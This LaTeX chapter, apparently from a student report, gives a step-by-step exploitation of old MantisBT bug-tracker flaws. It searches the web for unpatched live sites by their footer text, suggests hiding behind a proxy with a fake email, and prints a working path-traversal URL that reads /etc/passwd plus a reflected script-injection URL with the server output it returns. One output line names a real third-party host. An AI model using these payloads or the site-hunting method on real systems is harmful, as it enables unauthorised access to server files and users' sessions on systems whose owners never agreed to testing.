\chapter{Mantis Vulnerability} \label{ch:mantis}

Mantis is a free and open-source web-based bug tracking system. It's used in project management tool for issue tracking. Last version was 1.2.0 and released in February 2010.

\section{Vulnerability application}

The 5 september 2011, vulnerabilities have been announced corrected in MantisBT 1.2.7, these were Local File Inclusion and XSS vulnerabilities. Moreover the High-Tech Bridge Society \footnote{\url{https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_mantisbt.html}} grant us a few example that can be easily applied.

First of all, we need to find a website using MantisBT in its former version. Those which use MantisBT should have a \emph{Copyright © 2000 - 2008 Mantis Group} bottom left text (with some different years). With a simple google request "2008 Mantis Group" or any other year, we can expect to find not updated website. We'll pick the [host] website as an example.

The homepage ~\ref{home} allow us to signup with a new account asking only for a mail, user and password. For anonymous purpose we could have hide ourselves behind a proxy and used a faked mail-address. Once the user is created, we can connect and access to the vulnerable files.

\begin{figure}
\includegraphics[width=\textwidth]{img/capture.png}
\caption{Host HomePage}
\label{home}
\end{figure}

\section{File Access}
One of the MantisBT advantage is the add-ons that can be loaded on demand and easily implemented in php. One script \emph{bug\_actiongroup\_page.php} allow this operation. Unfortunately, this script doesn't sanitaze the argument, so through a HTTP GET method we inject a path.
\begin{lstlisting}
http://[host]/bug_actiongroup_page.php?bug_arr[]=1&action=EXT_/../../../../../../../etc/passwd%00
\end{lstlisting}
And this will be injected in something like:
\begin{lstlisting}
<?php 
$fichier=$1.php; 
$ligne=file($fichier); 
echo $ligne; 
?> 
\end{lstlisting}
The \%00 character is the end of line character in php, it does allow us not caring about the end of string, so the opened file will be "/etc/passwd" and not "/etc/passwd.php" which doesn't exist.
Moreover, we don't know the place in the server's tree repository of the website, therefore we try to reach the root with as much "../" as needed. If this test doesn't work (file not found exception), we should had more move to parent characters.

Finally, once we execute this code, we got the ~\ref{cap2} screenshot or the ~\ref{cap3} screenshot with the "/proc/cpuinfo" file.
\begin{figure}
\includegraphics[width=\textwidth]{img/capture2.png}
\caption{/etc/passwd}
\label{cap2}
\end{figure}
\begin{figure}
\includegraphics[width=\textwidth]{img/capture3.png}
\caption{/proc/cpuinfo}
\label{cap3}
\end{figure}

\section{Javascript injection}
\begin{figure}
\includegraphics[width=\textwidth]{img/capture4.png}
\caption{Javascript alert(document.cookie)}
\label{cap4}
\end{figure}

Watch out the javascript wasn't executed on chrome due to the webkit html motor controls whereas on firefox and its gecko motor everything runned fine.

This time, we try to use the \emph{bug\_actiongroup\_ext\_page.php} exploit. This file seems to generate a html content depending on the variable. Once again, we'll insert the javascript in the GET HTTP method. The special characters will be encoded to avoid basic analysis.
\begin{lstlisting}
http://[host]/bug_actiongroup_ext_page.php?bug_arr%5B0%5D=1&action=EXT_a
\end{lstlisting}
Return
\begin{lstlisting}
<input type="hidden" name="bug_actiongroup_a_token" value="20120105-3aaf421dd97f581d7d87ec09350230853ac6bc47"/>		<input type="hidden" name="action" value="a" />

SYSTEM WARNING: require_once(/var/www/bugs.mapwindow.org/bug_actiongroup_a_inc.php) [function.require-once]: failed to open stream: No such file or directory
\end{lstlisting}
So, this tryes to generate the name of the file to include and stored it in the HTML content. Here comes the javascript inclusion.
\begin{lstlisting}
http://[host]/bug_actiongroup_ext_page.php?bug_arr%5B0%5D=
1&action=EXT_%22+%2F%3E%3Cscript%3Ealert%280%29%3B%3C%
2Fscript%3E%3Ca+name%3D%22%00

+/><script>alert(0);</script><a name=
\end{lstlisting}
The zero alert is generated and no html error of closing brackets is detecting since we reopened a trash anchor \ref{cap4}.







